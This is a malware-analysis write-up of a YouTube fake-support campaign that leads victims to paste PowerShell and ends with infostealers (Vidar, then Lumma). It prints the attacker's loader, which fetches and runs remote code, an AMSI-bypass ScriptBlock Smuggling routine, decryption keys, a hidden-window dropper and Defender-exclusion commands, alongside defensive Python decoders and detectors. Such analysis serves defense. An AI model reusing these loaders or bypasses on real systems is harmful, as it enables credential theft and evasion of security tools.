20.06.2024
Ongoing series: #1 #2 #3 #4 #5 #6
youtube pc help
This journey began with a tweet by RussianPanda and the related article at eSentire, in which an incident started with the victim receiving a Windows Update error code. The victim came across a YouTube video that supposedly solved the problem and was lured to an IT-support-themed website. When I visited the site a day later, the first stage and the subsequent payloads had already changed, which is the basis for the following analysis.
The Video(s)
In addition to the YouTube video linked in the tweet, there are several other channels and videos with different thumbnails and content, all similarly structured and all linking to one or more supposed help sites in the video description. In some cases tinyurl links were used in the descriptions, either to obscure the destination or to allow it to be swapped quickly without editing the description after a domain report. This has already happened several times, as the videos point to different URLs for the sites. In addition, the later pages contain references to other, previously used URLs for distributing the malware.
| YouTube Link | Upload | Link in Description | Channel |
|-----------------------------------|------------|------------------------------------|-------------------|
| youtube[.]com/watch?v=PIQMXxhiv5A | 2024-05-10 | pchelprwizardsguide[.]com/Guide/ | @mrjparsons |
| youtube[.]com/watch?v=F8Bqe0QvVRY | 2024-05-10 | pchelprwizardsguide[.]com/Guide/ | @Fhaton |
| youtube[.]com/watch?v=gdH41agTRSE | 2024-05-14 | ontrendyt[.]com/2024/05/ | @OnTrendd |
| youtube[.]com/watch?v=_7u6QlUXYic | 2024-05-15 | pchelperspro[.]com/support/ | @jappaband |
| youtube[.]com/watch?v=WhdDcFQESiI | 2024-05-28 | pchelprwizzards[.]com/0x80070643/ | @imevil924 |
| youtube[.]com/watch?v=uBBMaL4lPlI | 2024-05-28 | pchelperspro[.]com/support/ | @Skoota18 |
| youtube[.]com/watch?v=9gEx90nuWtk | 2024-05-29 | base64 encoded CODE | @hocdehanh |
| youtube[.]com/watch?v=N3TzgqKA9bI | 2024-06-08 | pchelperspro[.]com/support/ | @olcaval |
| youtube[.]com/watch?v=qC622Kj7M1U | 2024-06-08 | repairtechforumpro[.]com/support/? | @olcaval |
| youtube[.]com/watch?v=y0_qWuNPEZw | 2024-06-09 | pchelperspro[.]com/support/ | @smpn4ponorogo773 |
| youtube[.]com/watch?v=6eSPQ0GR9tU | 2024-06-09 | repairtechforumpro[.]com/support/? | @smpn4ponorogo773 |
| youtube[.]com/watch?v=zRNxIzbgdcw | 2024-06-09 | pchelperspro[.]com/support/ | @ahmad____jo.1 |
| youtube[.]com/watch?v=9UpMYvOpfjc | 2024-06-09 | repairtechforumpro[.]com/support/? | @ahmad____jo.1 |
| youtube[.]com/watch?v=TA4yFmMvD0M | 2024-06-09 | pchelperspro[.]com/support/ | @pptqahda_po |
| youtube[.]com/watch?v=B9wJSoaAEHM | 2024-06-09 | repairtechforumpro[.]com/support/? | @pptqahda_po |
| youtube[.]com/watch?v=hmaj2cVr-Gc | 2024-06-09 | pchelperspro[.]com/support/ | @jappaband |
| youtube[.]com/watch?v=l6Tk8qD7ey8 | 2024-06-09 | pchelperspro[.]com/support/ | @jappaband |
| youtube[.]com/watch?v=NC84hYecc0c | 2024-06-09 | pchelperspro[.]com/support/ | @her_idza |
| youtube[.]com/watch?v=GAkblNCc3E8 | 2024-06-09 | repairtechforumpro[.]com/support/? | @her_idza |
| youtube[.]com/watch?v=W6ylM2K7SOM | 2024-06-09 | repairtechforumpro[.]com/support/? | @jappaband |
| youtube[.]com/watch?v=u88XPbJPdNo | 2024-06-09 | repairtechforumpro[.]com/support/? | @jappaband |
| youtube[.]com/watch?v=O1Au_TuJ5X4 | 2024-06-11 | pchelperspro[.]com/support/ | @jappaband |
The PC Help Site(s)
All the sites used are fronted by Cloudflare. The TLS certificates of the sites show different creation dates, suggesting that new domains were set up at those times to replace already blocked domains or to be ready for future blocks. After domains were taken down by the registrar, the video descriptions were updated to new domains, which are included in the following list.
| PC Help Site | Cert Created |
|---------------------------|--------------|
| pchelprwizardsguide[.]com | 2024-05-31 |
| repairtechforumpro[.]com | 2024-05-31 |
| pchelperspro[.]com | 2024-06-08 |
| pchelperspros[.]com | 2024-06-24 |
The design and structure of the site were apparently copied from this help page by IONOS. The fake site itself contains a rudimentary guide to supposedly fix the error. It instructs the user to run a PowerShell script with administrative privileges; the script is supplied either via the clipboard or alternatively as a Dropbox download of a `FIX_YT_CODE.ps1` file.
The Code (Stage 1)
```powershell
ipconfig /flushdns
$DiagnosticsProcess = "U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw==";
$UI = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($DiagnosticsProcess));
Invoke-Expression $UI;
[System.Diagnostics.Process]::Start("powershell", "-NoProfile -ExecutionPolicy Bypass -w 1 -enc `"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`"") | Out-Null;
exit;
```
This script does two things:
- The Base64-encoded variable `$DiagnosticsProcess` contains the command `Set-Clipboard -Value " ";`, which is executed via `Invoke-Expression` to clear the clipboard (the victim pasted the script from it) and cover the tracks.
- The longer Base64 block is also executed, but in a separate PowerShell child process started with `-ExecutionPolicy Bypass` to set the session policy and `-w 1` (`-WindowStyle Hidden`) to hide the window. Note that `-enc` expects the Base64 encoding of UTF-16LE text, so the blob must be decoded as such. Decoded, it yields the following, somewhat obfuscated, PowerShell script:
```powershell
# Builds https://execresource.ltd/KB/GREEN via the -f format operator and string concatenation
$QP = (("{2}{0}{1}"-f 'tps://execresource.l','td/KB/GR','ht')+'EEN');
Set-Item Variable:Jd 'Net.WebClient';
Set-Item Variable:\L5A ([Net.WebClient]::New());
# Looks up the WebClient method whose name ends in "Read" (OpenRead) instead of naming it
Set-Item Variable:rA ((((Get-Variable L5A).Value|Get-Member)|Where-Object{(Get-ChildItem Variable:\_).Value.Name-like'*Read'}).Name);
Set-Item Variable:\L5A (Get-Variable L5A).Value.((Get-Item Variable:/rA).Value)((Get-Variable QP -ValueOnly));
$Hu='';
# Reads the response one byte at a time; casting the -1 returned at end of stream to [Char] throws, which ends the loop
Try{
While((Get-Variable Hu).Value+=[Char](Get-Variable L5A).Value.ReadByte()){
}
}
Catch{};
# Resolves Invoke-Expression at run time through $ExecutionContext (E*xt) and the wildcard '*e-Ex*', then pipes the downloaded text into it
(Get-Variable Hu).Value|&(Get-Variable E*xt).Value.InvokeCommand.GetCmdlet((Get-Variable E*xt).Value.InvokeCommand.(((Get-Variable E*xt).Value.InvokeCommand|Get-Member|Where-Object{(Get-ChildItem Variable:\_).Value.Name-like'*Com*e'}).Name)('*e-Ex*',$TRUE,$TRUE))
```
This script also does two things, with some obfuscation added. It downloads a file from another Cloudflare-fronted domain (https://execresource[.]ltd/KB/GREEN) using `Net.WebClient` and its `OpenRead` method, reading the response one byte at a time; the cast of the `-1` returned at end of stream to `[Char]` throws, which is what ends the loop and is swallowed by the empty `Catch`. The download is another PowerShell script, which the final statement pipes into an `Invoke-Expression` that is resolved at run time via `$ExecutionContext.InvokeCommand` and the wildcard `'*e-Ex*'`, so neither the cmdlet name nor the method name `OpenRead` appears literally in the script text.
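As an added example (my code, not part of the original page or of the sample): a small Python triage helper that recovers the script passed via `-enc` from a process command line and undoes the two string tricks used by the loader, the `-f` format operator and literal concatenation, before pulling out URLs and any inline `FromBase64String` arguments. The command line it parses is constructed here from the fragments shown above; it is not a captured one.

```python
"""Decode a Stage 1 style powershell.exe launch and strip the loader's string
obfuscation.  Added example; the sample command line is constructed from the
fragments shown on the page, not captured."""
import base64
import re
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENC_ARG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[`\"']*([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)   # -w 1 == -WindowStyle Hidden
BYPASS_RE = re.compile(r"-ex\w*\s+bypass\b", re.I)
# ("{2}{0}{1}" -f 'a','b','c'): the format operator re-orders string pieces.
FMT_RE = re.compile(r"""\(\s*"((?:\{\d+\})+)"\s*-f\s*((?:'[^']*'\s*,?\s*)+)\)""")
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
B64_CALL_RE = re.compile(r"FromBase64String\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-enc carries base64 of UTF-16LE text, not of UTF-8."""
    m = ENC_ARG_RE.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def resolve_format_operator(script: str) -> str:
    """Replace ("{2}{0}{1}" -f 'x','y','z') with the literal it evaluates to."""
    def repl(m):
        order = [int(i) for i in re.findall(r"\{(\d+)\}", m.group(1))]
        parts = re.findall(r"'([^']*)'", m.group(2))
        return "'" + "".join(parts[i] for i in order) + "'"
    return FMT_RE.sub(repl, script)


def fold_concatenations(script: str) -> str:
    """Join adjacent 'a'+'b' literals until nothing changes."""
    while True:
        new = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        if new == script:
            return new
        script = new


def decode_inline_base64(script: str) -> List[str]:
    """Decode FromBase64String("...") arguments that are plain UTF-8 text."""
    out = []
    for b64 in B64_CALL_RE.findall(script):
        try:
            out.append(base64.b64decode(b64).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out


def triage(cmdline: str) -> Dict[str, object]:
    decoded = decode_encoded_command(cmdline)
    deob = fold_concatenations(resolve_format_operator(decoded)) if decoded else ""
    return {
        "hidden_window": bool(HIDDEN_RE.search(cmdline)),
        "execution_policy_bypass": bool(BYPASS_RE.search(cmdline)),
        "decoded_script": deob,
        "urls": URL_RE.findall(deob),
        "inline_base64": decode_inline_base64(deob),
    }


# Constructed sample: the first statement of the GREEN loader plus the Stage 1
# clipboard-wipe line, wrapped the way Stage 1 launches its child process.
INNER_SCRIPT = (
    "$QP = ((\"{2}{0}{1}\"-f 'tps://execresource.l','td/KB/GR','ht')+'EEN');\n"
    "$UI = [System.Text.Encoding]::UTF8.GetString("
    "[System.Convert]::FromBase64String(\"U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw==\"));\n"
)
ENCODED = base64.b64encode(INNER_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_CMDLINE = f'powershell -NoProfile -ExecutionPolicy Bypass -w 1 -enc "{ENCODED}"'

if __name__ == "__main__":
    for k, v in triage(SAMPLE_CMDLINE).items():
        print(f"{k}: {v}")
```

The same three command-line properties (`-enc`, `-w 1`, `-ExecutionPolicy Bypass`) are what a process-creation rule for this lure would key on; the decoding part is what you run on the matched event to get the next-stage URL without executing anything.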
The Code (Stage 2)
The downloaded and executed script scores 0/64 on VirusTotal, i.e. no engine flags it. This is because it uses a recently published AMSI bypass, labeled ScriptBlock Smuggling, which @_Hubbl3 and @Cx01N_ had described on the BC Security blog just three days earlier. The technique exploits the fact that PowerShell's security features (AMSI scanning and ScriptBlock logging) operate on the script text recorded in a ScriptBlock's Extent, while execution is driven by its AST, and that the two are assumed to correspond. That correspondence is not enforced: an AST can be constructed by hand with `[System.Management.Automation.Language.ScriptBlockAst]::new`, pairing the Extent of a harmless script with the body of a malicious one, so the text that gets scanned and logged is the harmless one.
The script first defines a function `Get-x6Tm3x` that reads thermal-zone temperature information via WMI and returns it in Celsius and Fahrenheit or, if no such information can be retrieved, terminates the process. This is a form of sandbox evasion: many virtual machines and sandboxes expose no ACPI thermal zone, so `Win32_PerfFormattedData_Counters_ThermalZoneInformation` returns nothing and the script exits before doing anything malicious (a check that also misfires on physical machines without such a thermal zone).
```powershell
function Get-x6Tm3x {
    $t = Get-WmiObject Win32_PerfFormattedData_Counters_ThermalZoneInformation -Namespace "root\CIMV2"
    if ($t -ne $null) {
        foreach ($i in $t) {
            $c = $i.Temperature / 10.0
            $f = ($c * 9 / 5) + 32
            return ("{0:F2} C : {1:F2} F" -f $c, $f)
        }
    } else {
        [Environment]::Exit(1)
    }
}
```
The more interesting part begins at line 17 of the script (lines 17 to 34 are shown below), where the pattern from the published ScriptBlockSmuggling.ps1 example is implemented with malicious intent. `$x2fM3d` holds a ScriptBlock whose text is simply `("G"+"et-"+"Da"+"te")`, i.e. `Get-Date`; its Extent is the decoy. `$w9eR1a` is initialized with a large Base64 block that decodes (as UTF-16LE) to the real code, which is wrapped in a second ScriptBlock. A new `ScriptBlockAst` is then assembled from the decoy's Extent and the real script's `EndBlock`, turned back into a ScriptBlock with `GetScriptBlock()` and invoked. The copied `EndBlock` is what executes; the Extent, `Get-Date`, is what AMSI and ScriptBlock logging get to see.
```powershell
$x2fM3d = [ScriptBlock]::Create(("G"+"et-"+"Da"+"te"))
$w9eR1a = ("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")
$y6uL4q = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($w9eR1a))
$k3mV5x = [ScriptBlock]::Create($y6uL4q)
$j4bN2t = $x2fM3d.Ast
$z7qX1w = $k3mV5x.Ast
$h9gP3d = $j4bN2t.Copy()
$v2mL4k = $z7qX1w.EndBlock.Copy()
$s1dR6j = [System.Management.Automation.Language.ScriptBlockAst]::new(
    $h9gP3d.Extent,
    $null,
    $null,
    $null,
    $v2mL4k,
    $null
)
$r3gY2aBlock = $s1dR6j.GetScriptBlock()
$r3gY2aBlock.Invoke() | Out-String
```
The code relevant to the further progression of the infection is in the Base64-encoded block, which contains additional PowerShell code. It introduces two more functions, `Convert-FromStringToBytes` and `Decrypt-XOR`, which are used later. Essentially, it downloads another stage from the already known domain (https://execresource[.]ltd/KB/enc). That stage is XOR-encrypted, with the key embedded in the script as `TUZXgMjRaaen6gVEHGdtc8Zpff6dV5M7`. The decrypted file is written to the user's temp directory as `tib_mounter_service.exe` and executed, again with a hidden window.
```powershell
$httpClient = New-Object System.Net.Http.HttpClient;
$url = 'https://execresource.ltd/KB/enc';
$path = [System.IO.Path]::GetTempPath() + 'tib_mounter_service.exe';
$task = $httpClient.GetByteArrayAsync($url);
$task.Wait();
$key = "TUZXgMjRaaen6gVEHGdtc8Zpff6dV5M7"
# Decrypt-XOR is defined earlier in the same block
$decryptedData = Decrypt-XOR -data $task.Result -key $key
[System.IO.File]::WriteAllBytes($path, $decryptedData);
$process = New-Object System.Diagnostics.Process;
$process.StartInfo.FileName = $path;
$process.StartInfo.UseShellExecute = $false;
$process.StartInfo.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden;
$process.Start();
```
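As an added example (my code, not the page's and not the sample's), here is how an analyst unwraps such a download offline and checks the result. The page does not reproduce the body of `Decrypt-XOR`, so the block assumes the usual repeating-key XOR (`byte[i] ^ key[i mod len(key)]`); everything else it assumes is marked in the code. It goes one step beyond the page: because the first 0x3C bytes of a DOS header produced by the standard Microsoft linker stub are constant, they serve as known plaintext, which lets you recover the key (and its length) from the ciphertext alone if the operator changes it. The "payload" is a constructed byte blob with a valid PE header layout, not the real executable.

```python
"""Unwrap the XOR-encrypted executable fetched by Stage 2 and validate it.

Added example; repeating-key XOR is assumed for Decrypt-XOR, and the sample
payload is a constructed stand-in, not the real file."""
import struct
from typing import Optional

KEY = b"TUZXgMjRaaen6gVEHGdtc8Zpff6dV5M7"   # key embedded in the Stage 2 script

# Bytes 0x00-0x3B of the DOS header emitted by the standard Microsoft linker
# stub; only e_lfanew at 0x3C varies, so these are usable known plaintext.
STANDARD_DOS_HEADER = bytes.fromhex(
    "4d5a90000300000004000000ffff0000"
    "b8000000000000004000000000000000"
) + bytes(0x3C - 0x20)


def xor_repeating(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """MZ magic plus a PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def decrypt_stage(ciphertext: bytes, key: bytes) -> Optional[bytes]:
    """Decrypt and accept the result only if it is structurally a PE file."""
    plain = xor_repeating(ciphertext, key)
    return plain if looks_like_pe(plain) else None


def recover_key(ciphertext: bytes, key_len: int) -> Optional[bytes]:
    """Known-plaintext recovery for a guessed key length.  Each key byte is
    derived from every header offset it covers; a contradiction means the
    length guess (or the standard-stub assumption) is wrong."""
    if not 1 <= key_len <= len(STANDARD_DOS_HEADER) or len(ciphertext) < len(STANDARD_DOS_HEADER):
        return None
    key = [None] * key_len
    for i, p in enumerate(STANDARD_DOS_HEADER):
        k = ciphertext[i] ^ p
        if key[i % key_len] is None:
            key[i % key_len] = k
        elif key[i % key_len] != k:
            return None
    return bytes(key)


def guess_key(ciphertext: bytes) -> Optional[bytes]:
    """Try every length the known header can cover; accept the first key that
    is self-consistent and also yields a well-formed PE."""
    for n in range(1, len(STANDARD_DOS_HEADER) + 1):
        k = recover_key(ciphertext, n)
        if k is not None and looks_like_pe(xor_repeating(ciphertext, k)):
            return k
    return None


def build_sample_pe() -> bytes:
    """Constructed stand-in: standard DOS header, e_lfanew = 0x40, PE signature,
    then padding.  Structurally a PE, not a runnable program."""
    return STANDARD_DOS_HEADER + struct.pack("<I", 0x40) + b"PE\0\0" + bytes(64)


if __name__ == "__main__":
    blob = xor_repeating(build_sample_pe(), KEY)      # what /KB/enc would serve
    print("decrypts to PE:", decrypt_stage(blob, KEY) is not None)
    print("recovered key:", guess_key(blob))
```

The key-recovery part relies on the sample having been linked with the standard stub; a packed or hand-crafted binary may only have `MZ` in common with it, in which case `recover_key` reports a contradiction and you fall back to the embedded key plus the `looks_like_pe` check.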
Update
The Stage 2 payload was changed during the day. In the second version ScriptBlock Smuggling is still used, but the payload in the Base64 block was modified. Instead of simply downloading and XOR-decrypting, an additional ScriptBlock was added that is AES-128-CBC encrypted and is decrypted with the additionally provided function `B`. The key and IV are passed Base64-encoded and decoded at run time: the key decodes to the 16-byte string `J5PEb6XJfmyKUqv7` (an AES-128 key), the IV to the 32-character hex string `9e30ca4e5a0c7b5eb204d96a4c18cb2e`, presumably hex-decoded to 16 bytes inside `B` (whose body is not reproduced here). The decrypted text is handed straight to `IEX`.
```powershell
$k = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("SjVQRWI2WEpmbXlLVXF2Nw=="))
$v = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("OWUzMGNhNGU1YTBjN2I1ZWIyMDRkOTZhNGMxOGNiMmU="))
$E = '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'
# B is the AES-128-CBC decryption helper defined earlier in the block
$D = B -e $E -k $k -v $v
IEX $D;
```
This encrypted code block includes additional anti-analysis measures. For example, a random sleep is executed several times, lasting at least about three seconds thanks to `Get-Random -Minimum 3100 -Maximum 5100` (milliseconds). Then another stage is downloaded, this time an archive. It is saved under a random filename with the `.zip` extension in the temp directory and extracted into a randomly named folder under ApplicationData (`\AppData\Roaming`). The first `.exe` found among the extracted files is then executed. This payload is also different from the previous one; more on that in the update to the next section.
```powershell
$client = New-Object System.Net.Http.HttpClient;
$url = 'https://execresource.ltd/KB/ENC';
$zipName = [System.IO.Path]::GetRandomFileName() + ".zip";
$zipPath = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), $zipName);
$task = $client.GetByteArrayAsync($url);
$task.Wait();
[System.IO.File]::WriteAllBytes($zipPath, $task.Result);
$appDir = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('ApplicationData'), [System.IO.Path]::GetRandomFileName());
[System.IO.Directory]::CreateDirectory($appDir);
# $rnd is set earlier in the block via Get-Random -Minimum 3100 -Maximum 5100
Start-Sleep -Milliseconds $rnd
[System.IO.Compression.ZipFile]::ExtractToDirectory($zipPath, $appDir);
Start-Sleep -Milliseconds $rnd
$exe = Get-ChildItem -Path $appDir -Filter *.exe -Recurse | Select-Object -First 1
if ($exe -ne $null) {
    $proc = New-Object System.Diagnostics.Process;
    $proc.StartInfo.FileName = $exe.FullName;
    $proc.StartInfo.UseShellExecute = $false;
    $proc.StartInfo.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden;
    $proc.Start();
}
```
Update #2
On a revisit the GREEN stage had changed again (2024-06-22 08:55). The Base64 block is unchanged, but the surrounding script was modified: before the smuggled block runs, it adds two folders (the user's `AppData` and `C:\ProgramData`) to Microsoft Defender's exclusion list via `Add-MpPreference`, then polls `Get-MpPreference` once a second until both exclusions are visible. `Add-MpPreference` needs administrative rights, which the help page had already asked the victim to grant; the staging directories used by the subsequent stages (the temp directory and `AppData\Roaming`) lie under the first of these exclusions.
```powershell
Add-MpPreference -ExclusionPath "$env:USERPROFILE\AppData"
Add-MpPreference -ExclusionPath "C:\ProgramData"
function FxC {
    param (
        [string]$p
    )
    $x = Get-MpPreference | Select-Object -ExpandProperty ExclusionPath
    return $x -contains $p
}
$z1 = "$env:USERPROFILE\AppData"
$z2 = "C:\ProgramData"
do {
    Start-Sleep -Seconds 1
} until ((FxC -p $z1) -and (FxC -p $z2))
```
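Defender records every such configuration change as event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, with the changed registry value in the message text, which makes the exclusion step the loudest part of this stage. As an added example (my code, not from the page), the following Python parses such messages and flags path exclusions broad enough to hide an entire staging area. The event texts are constructed, modelled on the 5007 message format; the list of "broad" locations is my own heuristic.

```python
"""Spot Defender exclusions that whitelist entire staging directories.

Added example, not from the page.  The event texts are constructed, modelled
on the message of event ID 5007 (Microsoft-Windows-Windows Defender/Operational),
which records each change as "New value: <registry value> = <data>"."""
import re
from typing import Dict, List

EXCLUSION_RE = re.compile(
    r"New value:\s*(?:HKLM|HKEY_LOCAL_MACHINE)\\SOFTWARE\\Microsoft\\Windows Defender\\"
    r"Exclusions\\(?P<kind>Paths|Extensions|Processes)\\(?P<target>[^=]+?)\s*=\s*0x0",
    re.IGNORECASE,
)

# Heuristic: targets broad enough that anything dropped there is never scanned.
BROAD_PATH_RE = re.compile(
    r"^(?:"
    r"[a-z]:"                                                           # whole drive
    r"|[a-z]:\\users(?:\\[^\\]+)?"                                      # C:\Users or one profile
    r"|[a-z]:\\users\\[^\\]+\\appdata(?:\\(?:roaming|local|locallow))?"  # AppData roots
    r"|[a-z]:\\programdata"
    r"|[a-z]:\\windows\\temp"
    r"|.*\\temp"                                                        # any Temp directory
    r")\\?$",
    re.IGNORECASE,
)


def parse_exclusion_events(messages: List[str]) -> List[Dict[str, object]]:
    """Extract every exclusion added in the given 5007 messages."""
    hits = []
    for msg in messages:
        m = EXCLUSION_RE.search(msg)
        if not m:
            continue
        kind, target = m.group("kind").lower(), m.group("target").strip()
        hits.append({
            "kind": kind,
            "target": target,
            "broad": kind == "paths" and BROAD_PATH_RE.match(target) is not None,
        })
    return hits


def suspicious_exclusions(messages: List[str]) -> List[str]:
    """Targets of path exclusions that cover a whole staging area."""
    return [h["target"] for h in parse_exclusion_events(messages) if h["broad"]]


PREFIX = ("Windows Defender Antivirus Configuration has changed. If this is an unexpected "
          "event you should review the settings as this may be the result of malware. "
          "Old value:  New value: ")
SAMPLE_EVENTS = [  # constructed; the first two mirror the Add-MpPreference calls above
    PREFIX + r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\victim\AppData = 0x0",
    PREFIX + r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData = 0x0",
    PREFIX + r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Vendor\Scanner = 0x0",
    PREFIX + r"HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = 0x1",
]

if __name__ == "__main__":
    for t in suspicious_exclusions(SAMPLE_EVENTS):
        print("broad exclusion added:", t)
```

On a live host the same state is visible through `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` and can be reverted with `Remove-MpPreference -ExclusionPath`; a narrow exclusion such as the vendor scanner directory in the sample is deliberately not flagged, because that is what legitimate software installers add.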
The Executable
The decrypted download from Stage 2 is an executable whose version information gives the original filename `Intel-SA-00086-CLI.exe`. It also carries a matching signature, dated 2018-08-01 10:39:00 UTC, that does not verify. Based on its behavior and the domains it contacts, it appears to be Vidar Stealer.
Update
After the Stage 2 payload changed, the final executable was replaced as well. The new variant consists of multiple files. The `.exe` that gets executed is a legitimate copy of the Plugin Container for Firefox, signed by Mozilla. However, the `mozglue.dll` shipped next to it is flagged as malicious on VirusTotal and classified as Lumma Stealer: the trusted, signed host process loads a tampered library from its own directory (DLL side-loading). The signature of this DLL does not verify, which indicates that it was modified. I therefore compared the original version 120.0.1 of the file (MD5: `bf53388280d2d166f35a7681a330fe7b`, valid signature) against the delivered file (MD5: `c0bc67fed91a77b9b3049b8ecf8155ed`, signature not verifiable). A diff of the two hex dumps shows the inserted strings `touchstone.ini` and `yate.asp` together with `ReadFile` and `ExitProcess`, consistent with added code that loads those two files, which is not part of the original behaviour.
```diff
< 000b59c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
---
> 000b59c0 00 00 52 65 61 64 46 69 6c 65 00 00 00 00 00 00 |..ReadFile......|
46515,46516c46515,46516
< 000b5de0 00 00 00 00 00 00 00 00 b9 a9 0b 80 01 00 00 00 |................|
< 000b5df0 01 00 00 00 00 00 00 00 b9 a9 0b 80 01 00 00 00 |................|
---
> 000b5de0 00 00 00 00 00 00 00 00 b9 a9 0b 80 01 74 6f 75 |.............tou|
> 000b5df0 63 68 73 74 6f 6e 65 2e 69 6e 69 00 01 00 00 00 |chstone.ini.....|
46703,46704c46703,46704
< 000b69a0 04 00 00 00 00 00 00 00 b4 af 0b 80 01 00 00 00 |................|
< 000b69b0 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 |................|
---
